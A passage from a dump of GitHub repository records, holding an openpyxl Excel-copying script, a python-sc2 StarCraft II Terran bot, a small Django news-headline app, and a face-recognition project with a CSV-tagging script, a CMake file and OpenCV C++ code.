range (0,17):\n\n\t\tif i <= 1:\n\t\t\tnewexcel.merge_cells(start_row=newrow+i,start_column=1, end_row=newrow+i, end_column=3)\n\t\t\tnewexcel.row_dimensions[newrow+i].height=20\n\t\tif '10.192' in oldexcel.cell(row=oldrow+i,column=1).value:\n\t\t\tprint oldexcel.cell(row=oldrow+i,column=1).value\n\t\tnewexcel.cell(row=newrow+i,column=1).value=oldexcel.cell(row=oldrow+i,column=1).value\n\t\tnewexcel.cell(row=newrow+i,column=1).font=oldexcel.cell(row=oldrow+i,column=1).font.copy()\n\t\tnewexcel.cell(row=newrow+i,column=1).fill=oldexcel.cell(row=oldrow+i,column=1).fill.copy()\n\t\tnewexcel.cell(row=newrow+i,column=1).border=oldexcel.cell(row=oldrow+i,column=1).border.copy()\n\t\tnewexcel.cell(row=newrow+i,column=1).alignment=oldexcel.cell(row=oldrow+i,column=1).alignment.copy()\n\n\t\tnewexcel.cell(row=newrow+i,column=2).value=oldexcel.cell(row=oldrow+i,column=2).value\n\t\tnewexcel.cell(row=newrow+i,column=2).font=oldexcel.cell(row=oldrow+i,column=1).font.copy()\n\t\tnewexcel.cell(row=newrow+i,column=2).fill=oldexcel.cell(row=oldrow+i,column=1).fill.copy()\n\t\tnewexcel.cell(row=newrow+i,column=2).border=oldexcel.cell(row=oldrow+i,column=1).border.copy()\n\t\tnewexcel.cell(row=newrow+i,column=2).alignment=oldexcel.cell(row=oldrow+i,column=1).alignment.copy()\n\n\t\tnewexcel.cell(row=newrow+i,column=3).value=oldexcel.cell(row=oldrow+i,column=3).value\n\t\tnewexcel.cell(row=newrow+i,column=3).font=oldexcel.cell(row=oldrow+i,column=1).font.copy()\n\t\tnewexcel.cell(row=newrow+i,column=3).fill=oldexcel.cell(row=oldrow+i,column=1).fill.copy()\n\t\tnewexcel.cell(row=newrow+i,column=3).border=oldexcel.cell(row=oldrow+i,column=1).border.copy()\n\t\tnewexcel.cell(row=newrow+i,column=3).alignment=oldexcel.cell(row=oldrow+i,column=1).alignment.copy()\n\n\t\t# newexcel.cell(row=newrow+i,column=4).value=oldexcel.cell(row=oldrow+i,column=4).value\n\t\t# newexcel.cell(row=newrow+i,column=4).font=oldexcel.cell(row=oldrow+i,column=1).font.copy()\n\t\t# newexcel.cell(row=newrow+i,column=4).fill=oldexcel.cell(row=oldrow+i,column=1).fill.copy()\n\t\t# newexcel.cell(row=newrow+i,column=4).border=oldexcel.cell(row=oldrow+i,column=1).border.copy()\n\t\t# newexcel.cell(row=newrow+i,column=4).alignment=oldexcel.cell(row=oldrow+i,column=1).alignment.copy()\n\treturn newrow+i\n\n\nprint 'Starting...'\nprint\nwbold=openpyxl.load_workbook(\"OID_Guatemala.xlsx\")\noldexcel=wbold.get_sheet_by_name(\"Sheet1\")\nwbnew=openpyxl.load_workbook(\"OID_Guatemala_Core-MPLS.xlsx\")\nnewexcel=wbnew.get_sheet_by_name(\"Sheet1\")\n\ninvalid=0\norirow=1\nformatrow=1\ncounter=1\noldtitle=''\nwhile orirow < oldexcel.max_row:\n\tif oldexcel.cell(row=orirow,column=1).value is None:\n\t\tinvalid+=1\n\telif 'Core-MPLS' in oldexcel.cell(row=orirow,column=1).value:\n\t\tif oldtitle!=oldexcel.cell(row=orirow-1,column=1).value:\n\t\t\tformatrow+=5\n\t\tformatrow=CopyCoreBlock(orirow-1,formatrow)\n\t\tprint 'Original Row =%s, Equipment Counter=%s, New Row=%s' % (orirow,counter,formatrow)\n\t\toldtitle=oldexcel.cell(row=orirow-1,column=1).value\n\n\n\t\tformatrow+=1\n\t\tcounter+=1\n\torirow+=1\n\n\n\n\n\n\n\nprint oldtitle\nprint 'Writing to Excel File'\nwbnew.save('OID_Guatemala_Core-MPLS.xlsx')\n\n"
}
] | 5 |
eddycwp/LakersBot | https://github.com/eddycwp/LakersBot | 0365289a9bfa7721436dc3d684084116da32ff1e | dc2443f89adf2305bdc688d8b7294f686869b108 | 0fb3335b06921383c4fec64b2bbc7928bfdf8092 | refs/heads/master | 2020-06-12T06:44:46.106563 | 2019-06-28T06:21:43 | 2019-06-28T06:21:43 | 194,223,260 | 0 | 0 | null | 2019-06-28T06:53:38 | 2019-06-28T06:21:45 | 2019-06-28T06:21:43 | null | [
{
"alpha_fraction": 0.5791446566581726,
"alphanum_fraction": 0.5897499322891235,
"avg_line_length": 46.701175689697266,
"blob_id": "51df1e1750e0b1a5349e55469572faf388aee785",
"content_id": "d8abea765939868481a177024129a67d9494dc6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21069,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 425,
"path": "/LakersBot.py",
"repo_name": "eddycwp/LakersBot",
"src_encoding": "UTF-8",
"text": "import random\n\nimport sc2\nfrom sc2 import Race, Difficulty\nfrom sc2.constants import *\nfrom sc2.player import Bot, Computer\nfrom sc2.player import Human\nfrom sc2 import BotAI\n\nimport time\nimport math\n\n\nclass Lakers(sc2.BotAI):\n def __init__(self, use_model=True):\n self.combinedActions = []\n self.enemy_expand_location = None\n self.first_supply_built=False\n #self.stage = \"early_rush\"\n self.counter_units = {\n #Enemy: [Enemy_Cunts, Army, Num]\n MARINE: [3, SIEGETANK, 1],\n MARAUDER: [3, MARINE, 3],\n REAPER: [3, SIEGETANK, 3],\n GHOST: [2, MARINE, 3],\n SIEGETANK: [1, BANSHEE, 1],\n BANSHEE: [1, MARINE, 3]\n }\n self.is_defend_rush = False\n self.defend_around = [COMMANDCENTER, SUPPLYDEPOT, SENSORTOWER, MISSILETURRET, BARRACKS, FACTORY]\n self.is_worker_rush = False\n self.attack_round = 0\n self.warmup = 1\n self.Army = []\n self.need_counter_attack = False\n\n async def on_step(self, iteration):\n await self.command_center(iteration)\n\n # Start\n async def command_center(self, iteration):\n await self.defend_rush(iteration)\n\n ############### 修建筑 ####################\n cc1 = self.units(COMMANDCENTER).ready\n if not cc1.exists:\n await self.worker_rush(iteration)\n return\n else:\n cc1 = cc1.first\n await self.build_SUPPLYDEPOT(cc1) # 修建补给站\n await self.build_BARRACKS(cc1) # 修建兵营\n await self.build_REFINERY(cc1) # 修建精炼厂\n await self.build_FACTORY(cc1) # 修建重工厂\n await self.build_STARPORT(cc1) # 修建星港\n\n ccs = self.units(COMMANDCENTER).ready\n if ccs.amount == 2:\n cc1 = ccs[0]\n cc2 = ccs[1]\n\n await self.build_ENGINEERINGBAY(cc1) # 修建工程站\n await self.build_SENSORTOWER(cc1) # 修建感应塔\n await self.build_MISSILETURRET(cc1) # 修建导弹他\n\n await self.build_SUPPLYDEPOT(cc2) # 修建补给站\n await self.build_BARRACKS(cc2) # 修建兵营\n await self.build_REFINERY(cc2) # 修建精炼厂\n await self.build_FACTORY(cc2) # 修建重工厂\n await self.build_STARPORT(cc2) # 修建星港\n await self.build_ENGINEERINGBAY(cc2) # 修建工程站\n await self.build_SENSORTOWER(cc2) # 修建感应塔\n await self.build_MISSILETURRET(cc2) # 修建导弹他\n\n ccs = self.units(COMMANDCENTER).ready\n if ccs.amount == 3:\n cc3 = ccs[2]\n await self.build_SUPPLYDEPOT(cc3) # 修建补给站\n await self.build_BARRACKS(cc3) # 修建兵营\n await self.build_REFINERY(cc3) # 修建精炼厂\n await self.build_FACTORY(cc3) # 修建重工厂\n await self.build_STARPORT(cc3) # 修建星港\n await self.build_ENGINEERINGBAY(cc3) # 修建工程站\n await self.build_SENSORTOWER(cc3) # 修建感应塔\n await self.build_MISSILETURRET(cc3) # 修建导弹他\n await self.build_GHOSTACADEMY(cc3) # 修建幽灵学院\n await self.build_BUNKER(cc3) # 修建地堡\n\n if self.units(COMMANDCENTER).ready.amount > 3:\n for cc in self.units(COMMANDCENTER).ready:\n await self.build_SUPPLYDEPOT(cc) # 修建补给站\n await self.build_BARRACKS(cc) # 修建兵营\n await self.build_REFINERY(cc) # 修建精炼厂\n await self.build_FACTORY(cc) # 修建重工厂\n await self.build_STARPORT(cc) # 修建星港\n await self.build_ENGINEERINGBAY(cc) # 修建工程站\n await self.build_SENSORTOWER(cc) # 修建感应塔\n await self.build_MISSILETURRET(cc) # 修建导弹他\n await self.build_GHOSTACADEMY(cc) # 修建幽灵学院\n await self.build_BUNKER(cc) # 修建地堡\n\n ################ 采矿 ######################\n #if not self.is_worker_rush:\n await self.distribute_workers()\n for a in self.units(REFINERY):\n if a.assigned_harvesters < a.ideal_harvesters:\n w = self.workers.closer_than(20, a)\n if w.exists:\n await self.do(w.random.gather(a))\n\n ################ 训练 ######################\n if self.units(COMMANDCENTER).ready.amount ==1 or (self.units(COMMANDCENTER).ready.amount > 1 and self.attack_round > self.warmup):\n for cc in self.units(COMMANDCENTER).ready:\n await self.train_WORKERS(cc) # 训练农民\n\n await self.train_MARINE(10) # 训练机枪兵\n await self.train_BANSHEE(2) # 训练女妖战机\n\n if self.attack_round >= self.warmup:\n await self.train_SIEGETANK(5) # 训练坦克\n\n if self.units(COMMANDCENTER).ready.amount > 2:\n await self.train_MARAUDER(5) # 训练掠夺者\n await self.train_REAPER(5) # 训练收割者\n await self.train_GHOST(2) # 训练幽灵\n\n ############### 扩张 ######################\n await self.expand_command_center(iteration)\n\n ############### 进攻 ###################\n # 前三轮主动进攻:机枪兵大于10个,女妖大于3,进攻\n if self.attack_round < self.warmup:\n if self.units(MARINE).amount >= 10 and self.units(BANSHEE).amount >= 2:\n for ma in self.units(MARINE).random_group_of(10):\n await self.do(ma.attack(self.enemy_start_locations[0]))\n for bs in self.units(BANSHEE).random_group_of(2):\n await self.do(bs.attack(self.enemy_start_locations[0]))\n self.attack_round += 1\n else:\n if self.units(MARINE).amount >= 20 and self.units(BANSHEE).amount >= 10:\n for ma in self.units(MARINE).random_group_of(20):\n await self.do(ma.attack(self.enemy_start_locations[0]))\n for bs in self.units(BANSHEE).random_group_of(10):\n await self.do(bs.attack(self.enemy_start_locations[0]))\n\n # 探测和策略调整\n #await self.strategy(iteration)\n\n async def strategy(self, iteration):\n #print(\"Detect and adjustment.\")\n await self.worker_detect(iteration)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is MARINE).amount >= 5:\n self.Army.append(SIEGETANK)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is BANSHEE).amount >= 2:\n self.Army.append(GHOST)\n self.Army.append(MARINE)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is MARAUDER).amount >= 2:\n self.Army.append(MARINE)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is GHOST).amount >= 2:\n self.Army.append(BANSHEE)\n if self.known_enemy_units.filter(lambda unit: unit.type_id is SIEGETANK).amount >= 2:\n self.Army.append(BANSHEE)\n self.Army.append(MARINE)\n\n ############ 功能函数 ################\n async def worker_rush(self, iteration):\n self.actions = []\n target = self.enemy_start_locations[0]\n if iteration == 0:\n print(\"We will bring you glory!!\")\n for worker in self.workers:\n self.actions.append(worker.attack(target))\n await self.do_actions(self.actions)\n\n async def worker_detect(self, iteration):\n self.actions = []\n target = self.enemy_start_locations[0]\n if iteration != 0 and iteration / 500 == 0:\n for worker in self.workers:\n self.actions.append(worker.attack(target))\n break\n await self.do_actions(self.actions)\n\n async def marine_detect(self, iteration):\n self.actions = []\n target = self.enemy_start_locations[0]\n if iteration != 0 and iteration / 10 == 0:\n for unit in self.units(MARINE):\n self.actions.append(unit.attack(target))\n break\n await self.do_actions(self.actions)\n\n async def train_WORKERS(self, cc):\n for cc in self.units(COMMANDCENTER).ready.noqueue:\n workers = len(self.units(SCV).closer_than(15, cc.position))\n minerals = len(self.state.mineral_field.closer_than(15, cc.position))\n if minerals > 4:\n if workers < 18:\n if self.can_afford(SCV):\n await self.do(cc.train(SCV))\n\n async def build_SUPPLYDEPOT(self, cc):\n if self.supply_left <= 3 and self.can_afford(SUPPLYDEPOT) and not self.already_pending(SUPPLYDEPOT): # and not self.first_supply_built:\n await self.build(SUPPLYDEPOT, near = cc.position.towards(self.game_info.map_center, 20))\n\n async def build_BARRACKS(self, cc):\n if self.units(BARRACKS).amount == 0 and self.can_afford(BARRACKS):\n await self.build(BARRACKS, near = cc.position.towards(self.game_info.map_center, 20))\n if self.units(BARRACKS).amount < self.units(COMMANDCENTER).amount * 2 and self.units(FACTORY).ready.exists and self.can_afford(BARRACKS):\n await self.build(BARRACKS, near = cc.position.towards(self.game_info.map_center, 20))\n #if self.units(BARRACKS).amount < 2 and self.units(STARPORT).ready.exists and self.can_afford(BARRACKS):\n # await self.build(BARRACKS, near = cc.position.towards(self.game_info.map_center, 20))\n\n async def build_FACTORY(self, cc):\n if self.units(FACTORY).amount < self.units(COMMANDCENTER).amount and self.units(BARRACKS).ready.exists and self.can_afford(FACTORY) and not self.already_pending(FACTORY):\n await self.build(FACTORY, near = cc.position.towards(self.game_info.map_center, 10))\n # 修建 FACTORYTECHLAB, 以建造坦克\n for sp in self.units(FACTORY).ready:\n if sp.add_on_tag == 0:\n await self.do(sp.build(FACTORYTECHLAB))\n\n async def build_STARPORT(self, cc):\n if self.units(STARPORT).amount < self.units(COMMANDCENTER).amount and self.units(FACTORY).ready.exists and self.can_afford(STARPORT) and not self.already_pending(STARPORT):\n await self.build(STARPORT, near = cc.position.towards(self.game_info.map_center, 5))\n # 修建 STARPORTTECHLAB, 以训练女妖\n for sp in self.units(STARPORT).ready:\n if sp.add_on_tag == 0:\n await self.do(sp.build(STARPORTTECHLAB))\n\n async def build_ENGINEERINGBAY(self, cc):\n if self.units(ENGINEERINGBAY).amount < self.units(COMMANDCENTER).amount and self.can_afford(ENGINEERINGBAY) and not self.already_pending(ENGINEERINGBAY):\n await self.build(ENGINEERINGBAY, near = cc.position.towards(self.game_info.map_center, 25))\n\n async def build_SENSORTOWER(self, cc):\n if self.units(SENSORTOWER).amount < 2 * self.units(COMMANDCENTER).amount and self.units(ENGINEERINGBAY).ready.exists and self.can_afford(SENSORTOWER) and not self.already_pending(SENSORTOWER):\n await self.build(SENSORTOWER, near = cc.position.towards(self.game_info.map_center, 5))\n\n async def build_MISSILETURRET(self, cc):\n if self.units(MISSILETURRET).amount < 2 * self.units(COMMANDCENTER).amount and self.units(SENSORTOWER).ready.exists and self.can_afford(MISSILETURRET) and not self.already_pending(MISSILETURRET):\n await self.build(MISSILETURRET, near = cc.position.towards(self.game_info.map_center, 5))\n await self.build(MISSILETURRET, near=self.find_ramp_corner(cc))\n\n async def build_GHOSTACADEMY(self, cc):\n if self.units(GHOSTACADEMY).amount < self.units(COMMANDCENTER).amount and self.units(FACTORY).ready.exists and self.can_afford(GHOSTACADEMY) and not self.already_pending(GHOSTACADEMY):\n await self.build(GHOSTACADEMY, near = cc.position.towards(self.game_info.map_center, 9))\n\n async def build_BUNKER(self, cc):\n if self.units(BUNKER).amount < 2 * self.units(COMMANDCENTER).amount and self.units(GHOSTACADEMY).ready.exists and self.can_afford(BUNKER) and not self.already_pending(BUNKER):\n await self.build(BUNKER, near = cc.position.towards(self.game_info.map_center, 5))\n\n async def build_REFINERY(self, cc):\n if self.units(BARRACKS).exists and self.units(REFINERY).amount < self.units(COMMANDCENTER).amount * 2 and self.can_afford(REFINERY) and not self.already_pending(REFINERY):\n vgs = self.state.vespene_geyser.closer_than(20.0, cc)\n for vg in vgs:\n if self.units(REFINERY).closer_than(1.0, vg).exists:\n break\n worker = self.select_build_worker(vg.position)\n if worker is None:\n break\n await self.do(worker.build(REFINERY, vg))\n break\n\n def find_ramp_corner(self, cc):\n ramp = self.main_base_ramp.corner_depots\n cm = self.units(COMMANDCENTER)\n ramp = {d for d in ramp if cm.closest_distance_to(d) > 1}\n return ramp.pop()\n\n def get_the_front_cc(self):\n ccs = self.units(COMMANDCENTER).ready\n return ccs[self.units(COMMANDCENTER).ready.amount - 1]\n\n # 训练机枪兵\n async def train_MARINE(self, number):\n if self.units(MARINE).idle.amount < number:\n for barrack in self.units(BARRACKS).ready.noqueue:\n if self.can_afford(MARINE):\n await self.do(barrack.train(MARINE))\n for mr in self.units(MARINE).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练掠夺者\n async def train_MARAUDER(self, number):\n if self.units(MARAUDER).idle.amount < number and self.can_afford(MARAUDER):\n for marauder in self.units(BARRACKS).ready:\n await self.do(marauder.train(MARAUDER))\n for mr in self.units(MARAUDER).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练收割者\n async def train_REAPER(self, number):\n if self.units(REAPER).idle.amount < number and self.can_afford(REAPER):\n for re in self.units(BARRACKS).ready:\n await self.do(re.train(REAPER))\n for mr in self.units(REAPER).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练幽灵\n async def train_GHOST(self, number):\n if self.units(GHOST).idle.amount < number and self.can_afford(GHOST):\n for gst in self.units(GHOSTACADEMY).ready:\n await self.do(gst.train(GHOST))\n for mr in self.units(GHOST).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练坦克\n async def train_SIEGETANK(self, number):\n if self.units(SIEGETANK).idle.amount < number and self.can_afford(SIEGETANK):\n for st in self.units(FACTORY).ready:\n await self.do(st.train(SIEGETANK))\n for mr in self.units(SIEGETANK).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n # 训练女妖战机\n async def train_BANSHEE(self, number):\n if self.units(BANSHEE).idle.amount < number:\n for bs in self.units(STARPORT).ready:\n if self.can_afford(BANSHEE):\n await self.do(bs.train(BANSHEE))\n for mr in self.units(BANSHEE).idle:\n await self.do(mr.move(self.find_ramp_corner(self.get_the_front_cc)))\n\n async def defend_rush(self, iteration):\n # 如果兵力小于15,认为是前期的rush\n if iteration < 800 and (len(self.units(MARINE)) + len(self.units(REAPER)) + len(self.units(MARAUDER)) < 15 and self.known_enemy_units) or self.is_defend_rush:\n threats = []\n for structure_type in self.defend_around:\n for structure in self.units(structure_type):\n threats += self.known_enemy_units.closer_than(11, structure.position)\n if len(threats) > 0:\n break\n if len(threats) > 0:\n break\n\n # 如果有7个及以上的威胁,调动所有农民防守,如果有机枪兵也投入防守\n if len(threats) >= 7:\n self.attack_round += 1\n self.is_defend_rush = True\n self.need_counter_attack = True\n defence_target = threats[0].position.random_on_distance(random.randrange(1, 3))\n for pr in self.units(SCV):\n self.combinedActions.append(pr.attack(defence_target))\n for ma in self.units(MARINE).random_group_of(round(len(self.units(MARINE)) / 2)):\n self.combinedActions.append(ma.attack(defence_target))\n\n # 如果有2-6个威胁,调动一半农民防守,如果有机枪兵也投入防守\n elif 1 < len(threats) < 7:\n self.attack_round += 1\n self.is_defend_rush = True\n defence_target = threats[0].position.random_on_distance(random.randrange(1, 3))\n self.scv1 = self.units(SCV).random_group_of(round(len(self.units(SCV)) / 2))\n for scv in self.scv1:\n self.combinedActions.append(scv.attack(defence_target))\n for ma in self.units(MARINE).random_group_of(round(len(self.units(MARINE)) / 2)):\n self.combinedActions.append(ma.attack(defence_target))\n\n # 只有一个威胁,视为骚扰,调动一个农民防守\n elif len(threats) == 1 and not self.is_defend_rush:\n self.is_defend_rush = True\n defence_target = threats[0].position.random_on_distance(random.randrange(1, 3))\n self.scv2 = self.units(SCV).random_group_of(2)\n for scv in self.scv2:\n self.combinedActions.append(scv.attack(defence_target))\n\n elif len(threats) == 0 and self.is_defend_rush:\n # 继续采矿\n for worker in self.workers:\n closest_mineral_patch = self.state.mineral_field.closest_to(worker)\n self.combinedActions.append(worker.gather(closest_mineral_patch))\n\n # 小规模防守反击\n if self.need_counter_attack:\n self.need_counter_attack = False\n if self.units(MARINE).amount > 5:\n self.ca_ma = self.units(MARINE).random_group_of(5)\n for ma in self.ca_ma:\n self.combinedActions.append(ma.attack(self.enemy_start_locations[0]))\n if self.units(BANSHEE).amount > 2:\n self.ca_bs = self.units(BANSHEE).random_group_of(2)\n for bs in self.ca_bs:\n self.combinedActions.append(bs.attack(self.enemy_start_locations[0]))\n\n self.is_worker_rush = False\n self.is_defend_rush = False\n await self.do_actions(self.combinedActions)\n else:\n self.is_worker_rush = False\n self.is_defend_rush = False\n # 继续采矿\n for worker in self.workers.idle:\n closest_mineral_patch = self.state.mineral_field.closest_to(worker)\n self.combinedActions.append(worker.gather(closest_mineral_patch))\n\n async def expand_command_center(self, iteration):\n #if self.units(COMMANDCENTER).exists and (iteration > self.units(COMMANDCENTER).amount * 1500) and self.can_afford(COMMANDCENTER):\n if self.units(COMMANDCENTER).exists and (self.attack_round > self.warmup or iteration > self.units(COMMANDCENTER).amount * 1500) and self.can_afford(COMMANDCENTER):\n location = await self.get_next_expansion()\n await self.build(COMMANDCENTER, near=location, max_distance=10, random_alternative=False, placement_step=1)\n\nclass WorkerRushBot(BotAI):\n def __init__(self):\n super().__init__()\n self.actions = []\n\n async def on_step(self, iteration):\n self.actions = []\n\n if iteration == 5000:\n target = self.enemy_start_locations[0]\n\n for worker in self.workers:\n self.actions.append(worker.attack(target))\n\n await self.do_actions(self.actions)\n\ndef main():\n sc2.run_game(sc2.maps.get(\"PortAleksanderLE\"), [\n Bot(Race.Terran, Lakers()),\n #Bot(Race.Terran, WorkerRushBot())\n Computer(Race.Terran, Difficulty.Hard)\n #Human(Race.Terran)\n ], realtime=False)\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7674418687820435,
"alphanum_fraction": 0.7906976938247681,
"avg_line_length": 20.5,
"blob_id": "9c3bacc42b68cd5a1b42960b33c3733c53ea1216",
"content_id": "92a0a3eb588418b0789e4f32a015bca8123ef7fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 43,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 2,
"path": "/README.md",
"repo_name": "eddycwp/LakersBot",
"src_encoding": "UTF-8",
"text": "# LakersBot\nSimple bot based on python-sc2\n"
}
] | 2 |
Django-Rabi/Local_repo | https://github.com/Django-Rabi/Local_repo | 69a5ac099a5da70dfcfd4a20f1ed4b58ebf14e05 | ba53cb442264e15b2ca2a7507556c921cea6369c | bb3190718166c411aa38841a260cf4f762af4a8a | refs/heads/master | 2023-07-05T19:14:14.593429 | 2021-09-03T11:44:16 | 2021-09-03T11:44:16 | 402,749,599 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6818980574607849,
"alphanum_fraction": 0.7082601189613342,
"avg_line_length": 38.24137878417969,
"blob_id": "c365489972a711e230ac375b5c34a917d8408324",
"content_id": "ad0d3c33fd2161ecb710f015a96e201bfa24e510",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1138,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 29,
"path": "/Demo11_Rabi_News_Project/newsApp/views.py",
"repo_name": "Django-Rabi/Local_repo",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\ndef index(request):\n return render(request,'newsApp/index.html')\n\ndef moviesinfo(request):\n head_msg='Latest Movie Information'\n msg1='Sonali slowly getting cured'\n msg2='Salman going to marriage soon'\n msg3='Narendra Modi is going to act in some movie'\n my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}\n return render(request,'newsApp/news.html',context=my_dict)\n\ndef sportsinfo(request):\n head_msg='Latest Sports Information'\n msg1='Anushka Sharma Firing Like anything'\n msg2='Kohli updating in game anything can happend'\n msg3='India Performance not upto the mark in asian Games'\n my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}\n return render(request,'newsApp/news.html',context=my_dict)\n\ndef politicsinfo(request):\n head_msg='Latest Politcs Information'\n msg1='Achhce Din Aaa gaya'\n msg2='Rupee Value now 1$:70Rs'\n msg3='In India Single Paisa Black money No more'\n my_dict={'head_msg':head_msg,'msg1':msg1,'msg2':msg2,'msg3':msg3}\n return render(request,'newsApp/news.html',context=my_dict)\n"
}
] | 1 |
HoboQian/face_recognize | https://github.com/HoboQian/face_recognize | 46258b507cd89cc03d369b5c7d7069fb07c1ed04 | 5e03779b5109527ddc92d4a8c051059dd6070e88 | 9c98db93469dc1662de93b4b123c7669d9b005c3 | refs/heads/master | 2021-05-04T00:14:16.115200 | 2018-03-01T05:41:53 | 2018-03-01T05:41:53 | 120,408,734 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5351933836936951,
"alphanum_fraction": 0.540900468826294,
"avg_line_length": 28.960784912109375,
"blob_id": "36b9f63d4530299600154cc97c75d8a5c38bd8f7",
"content_id": "a90ea461f9b4c24e9cab7ac6acee5befaabd62a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 51,
"path": "/Add_Tag_IN_CSV_FILE.py",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "import sys\r\nimport os\r\nimport glob\r\n\r\n# -*- coding: utf-8 -*-\r\nauthor__ = 'hobo'\r\n\r\nFILE_PATH = 'F:/Work_File_share/Face_Recognize_hobo/raw/'\r\nFILE_NAME = 'train_data.txt'\r\nGENERATE_FILE_NAME = 'csv.txt'\r\nCOMPLETE_RAW_FILE_PATH = FILE_PATH + FILE_NAME\r\nCOMPLETE_GENERATE_FILE_PATH = FILE_PATH + GENERATE_FILE_NAME\r\n\r\ndef add_tag_in_csv_file():\r\n raw_file = open(COMPLETE_RAW_FILE_PATH, 'r')\r\n generate_file = open(COMPLETE_GENERATE_FILE_PATH, 'a+')\r\n\r\n if raw_file is None:\r\n print ('ERROR: RAW file can not been opened.')\r\n return\r\n\r\n NAME = '' # used to distinguish name\r\n TAG_NUM = -1\r\n for line in raw_file:\r\n line1 = line.replace('\\\\', '/')\r\n line2 = line1.replace(FILE_PATH, './at/')\r\n temp = line2.split('/')\r\n temp_name = temp[2] # get the file name\r\n if temp_name != NAME:\r\n NAME = temp_name\r\n TAG_NUM = TAG_NUM + 1\r\n replace_str = ';' + str(TAG_NUM) + '\\n' # let the string together\r\n generate_file.write(line2.replace('\\n', replace_str))\r\n\r\n raw_file.close()\r\n generate_file.close()\r\n\r\ndef generate_csv_file():\r\n print ('NEED IMPLEMENTED LATER.')\r\n # glob.glob(\"F:/Work_File_share/Face_Recognize_hobo/raw/*/*.jpg\")\r\n # os.system('dir / b / s *.bmp > at.txt')\r\n\r\ndef main():\r\n print ('First we wille generate csv file:')\r\n generate_csv_file()\r\n print (\"Now, add tag in csv file.\")\r\n add_tag_in_csv_file()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()"
},
{
"alpha_fraction": 0.7533039450645447,
"alphanum_fraction": 0.7621145248413086,
"avg_line_length": 36.83333206176758,
"blob_id": "bcc786c6795f53ac6003de78e7a97e28b2c8d958",
"content_id": "da66e3fabae1827913cc2a0f7ed49cf42326e233",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 6,
"path": "/CMakeLists.txt",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8)\nproject( face_recg )\nfind_package( OpenCV REQUIRED )\ninclude_directories( ${OpenCV_INCLUDE_DIRS} )\nadd_executable( face_recg face_recg.cpp )\ntarget_link_libraries( face_recg ${OpenCV_LIBS} )\n"
},
{
"alpha_fraction": 0.7572815418243408,
"alphanum_fraction": 0.7572815418243408,
"avg_line_length": 33.33333206176758,
"blob_id": "06c28fb591ead6e827b74cbfac1a5c2f2e0bff65",
"content_id": "9905a6b9e81677833b37645ee3634d978420d713",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 208,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 6,
"path": "/README.md",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "# face_recognize\nUse opencv lib realize face recognize. Write in c++.\n\nface_recg.cpp : the raw code of recognize;\ntrain_data.txt : the csv file of the data for training;\nCMakeLists.txt : the CMake makefile\n"
},
{
"alpha_fraction": 0.603520393371582,
"alphanum_fraction": 0.6348901987075806,
"avg_line_length": 29.047121047973633,
"blob_id": "aa1d2bd1fd9615f895ac02d3e854186bcbeb5e5f",
"content_id": "b76695ee290c754d521a973b1df24d3288381d67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5738,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 191,
"path": "/face_recg_all.cpp",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "#define _CRT_SECURE_NO_DEPRECATE\n#include <iostream>\n#include <sstream>\n#include <fstream>\n//#include <stdio.h>\n#include <opencv2/core.hpp>\n#include <opencv2/core/utility.hpp>\n#include <opencv2/core/ocl.hpp>\n#include <opencv2/imgcodecs.hpp>\n#include <opencv2/highgui.hpp>\n#include <opencv2/features2d.hpp>\n#include <opencv2/calib3d.hpp>\n#include <opencv2/imgproc.hpp>\n#include <opencv2/flann.hpp>\n#include <opencv2/xfeatures2d.hpp>\n#include <opencv2/ml.hpp>\n#include <opencv2/face.hpp>\n#include <opencv2/face/facerec.hpp>\n#include <opencv2/objdetect.hpp>\n\nusing namespace cv;\nusing namespace std;\nusing namespace cv::xfeatures2d;\nusing namespace cv::ml;\nusing namespace face;\n\n//#define READ_CSV\n\n#ifdef READ_CSV\nvoid read_csv(string& fileName,vector<Mat>& images,vector<int>& labels,char separator = ';')\n{\n\tifstream file(fileName.c_str(), ifstream::in);\n\tif (!file) {\n\t\tcout << \"No valid input file was given, please check the given filename.\" << endl;\n\t\treturn;\n\t}\n\n\tstring line, path, label;\n\n\twhile (getline(file, line)) {\n\t\tstringstream lines(line);\n\t\tgetline(lines, path, 